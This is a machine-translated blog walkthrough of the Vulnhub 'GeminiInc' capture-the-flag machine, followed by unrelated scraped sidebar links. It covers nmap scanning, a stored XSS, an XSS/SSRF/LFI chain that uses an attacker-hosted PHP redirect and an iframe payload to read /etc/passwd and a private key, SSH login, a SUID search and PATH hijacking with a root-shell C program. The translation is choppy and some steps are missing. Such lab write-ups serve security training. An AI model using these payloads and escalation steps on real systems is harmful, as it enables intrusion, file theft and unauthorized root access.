当前位置:网站首页>Vulnhub geminiinc
Vulnhub geminiinc
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Catalog
Two 、 Service version detection
3、 ... and 、 information gathering
6、 ... and 、 information gathering
7、 ... and 、 Combined boxing XSS+SSRF+LFI
8、 ... and 、 Read gemini Private key
2.ssh Public private key login
1. /usr/bin/listinfo File analysis
11、 ... and 、 The system command file is forged
2. Modify environment variables
One 、 The host found
Half open scan
nmap -sS ip
Two 、 Service version detection
3、 ... and 、 information gathering
1. Unable to load
80 The resources of the port cannot be loaded normally , Because I have been visiting Google Some sites of , Hang a ladder to visit .
2. The main page
The source code address is given to us
3. Source code
View one by one , stay install Under the folder [email protected]
4. Try signing in
Successfully logged in , There are more functions in the upper left corner
Four 、 Analysis function
1.export Output pdf
2.edit profile Edit the file
The information we modify will be displayed intact on the information board . There is no filter at the user name ,
5、 ... and 、 Storage type xss
Not enough to help us break through the border
6、 ... and 、 information gathering
1.export Output
We found an application in document attributes . It's just one. html turn pdf Application .
7、 ... and 、 Combined boxing XSS+SSRF+LFI
After searching , We can know that these three vulnerabilities exist in this application component . Through the combination of vulnerabilities , To read local files .
1. Local open apache service
systemctl start apache2
cd /var/www/html
sudo vim 1.php
Create a 1.php file
write in :
<?php
$file = $_GET['file'];
header("location:file://$file");
2. Inject payload
<iframe src="http://ip/1.php?file=/etc/passwd" width="100%" height=1220></iframe>
3.export Trigger
Successfully read /etc/passwd file . You can see gemini Can pass shell Sign in
8、 ... and 、 Read gemini Private key
Save to kali On
2.ssh Public private key login
Successfully logged in
Nine 、find Information search
find / -type f -user root -perm -u+xs -ls 2>/dev/null
Ten 、 Binary file view
1. /usr/bin/listinfo File analysis
strings /usr/bin/listinfo
Content :
The core code is these sentences , Called the system command
2. The implementation of
11、 ... and 、 The system command file is forged
1. newly build date file
vim date.c
Content :
#include<sys/types.h>
#include<unistd.h>
#include<stdlib.h>
int main(){
setuid(0);
setgid(0);
system("/bin/bash");
}
2. Modify environment variables
First look at the front , Then look from the back
export PATH=/tmp:$PATH
3. perform listinfo
Mention right to success
Get flag.txt
边栏推荐
- R语言使用data.table包进行数据聚合统计计算滑动窗口统计值(Window Statistics)、计算滑动分组中位数(median)并合并生成的统计数据到原数据集中
- PHP基础
- vulnhub之presidential
- Redis things
- This article explains the complex relationship between MCU, arm, MCU, DSP, FPGA and embedded system
- Hongmeng third training (project training)
- 剑指offer专项32-96题做题笔记
- vulnhub之Ripper
- 按键切换:按F1-F12都需要按Fn
- ORACLE进阶(一) 通过EXPDP IMPDP命令实现导dmp
猜你喜欢
The world's most popular font editor FontCreator tool
Cuiyusong, CTO of youzan: the core goal of Jarvis is to make products smarter and more reliable
Kibana~Kibana的安装和配置
Visual Studio 2022下载及配置OpenCV4.5.5
C language AES encryption and decryption
vulnhub之momentum
Kibana - installation and configuration of kibana
rxjs Observable filter Operator 的实现原理介绍
Arctangent entropy: the latest SCI paper in July 2022
Machine learning 3.2 decision tree model learning notes (to be supplemented)
随机推荐
cgroup简介
DS90UB949
Dynamic programming (interval DP)
vulnhub之GeminiInc v2
Key switch: press FN when pressing F1-F12
POI excel cell wrap
vulnhub之cereal
STL教程10-容器共性和使用场景
Kibana~Kibana的安装和配置
How to clean up v$rman_ backup_ job_ Details view reports error ora-02030
R语言使用gridExtra包的grid.arrange函数将ggplot2包的多个可视化图像横向组合起来,ncol参数自定义组合图列数、nrow参数自定义组合图行数
VS2015的下载地址和安装教程
Keepalived中Master和Backup角色选举策略
Qt+VTK+OCCT读取IGES/STEP模型
Solicitation for JGG special issue: spatio-temporal omics
Xml的(DTD,xml解析,xml建模)
vulnhub之momentum
CSRF
《剑指offer 03》数组中重复的数字
Software testing weekly (issue 78): the more confident you are about the future, the more patient you are about the present.